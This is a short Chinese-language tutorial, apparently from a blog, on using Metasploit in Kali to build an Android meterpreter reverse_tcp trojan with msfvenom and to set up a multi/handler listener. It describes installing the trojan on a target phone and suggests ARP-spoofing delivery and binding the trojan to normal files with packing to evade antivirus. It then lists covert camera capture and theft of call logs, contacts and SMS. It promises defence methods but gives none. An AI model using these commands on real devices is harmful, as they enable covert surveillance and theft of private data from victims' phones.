MSF測試,既然是入侵,當然需要一個安卓的手機,(電腦也行看自己怎麼方便就行)
msf,也就是我們經常說的Metasploit,只是一種簡稱。它是一個檢測漏洞的工具,裡面集成了微軟發布的大部分漏洞。今天我們已KALI系統為例子說一下它的部分用法和防範方法。
一:首先我們生成一個安卓的木馬,先查看自己電腦的IP,可以在控制終端輸入ipconfig,
二:繼續在終端輸入
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.80.132 LPORT=5555 R > /root/apk.apk 輸入完我們會在ROOT目錄看到apk.apk這個文件,這就是生成的木馬,
當然我們還需要設置一些參數,繼續終端輸入msfconsole,
然後輸入
1. use exploit/multi/handler 加載模塊
2. set payload android/meterpreter/reverse_tcp 選擇Payload
3.show options 查看參數設置
四:從控制端我們看到有幾個參數需要設置,輸入
1.set LHOST 192.168.80.132 這裡的地址設置成我們剛才生成木馬的IP位址
2.set LPORT 5555 這裡的埠設置成剛才我們生成木馬所監聽的埠
3.exploit 開始執行漏洞 開始監聽...
五:最重要的一步,把生成的木馬程序放到我們目標手機上安裝,(方法有太多種了,我們是測試所以直接安裝就可以了,還有ARP欺騙安裝,或者把木馬和正常的圖片或程序合成,經過多次加殼好360也是很難檢測出來的)
可以看到已經連接了
接下來我們就可以想幹什麼就幹什麼了,
webcam_snap隱秘拍照
webcam_stream打開攝像頭
通話記錄導出,電話本,簡訊 等等,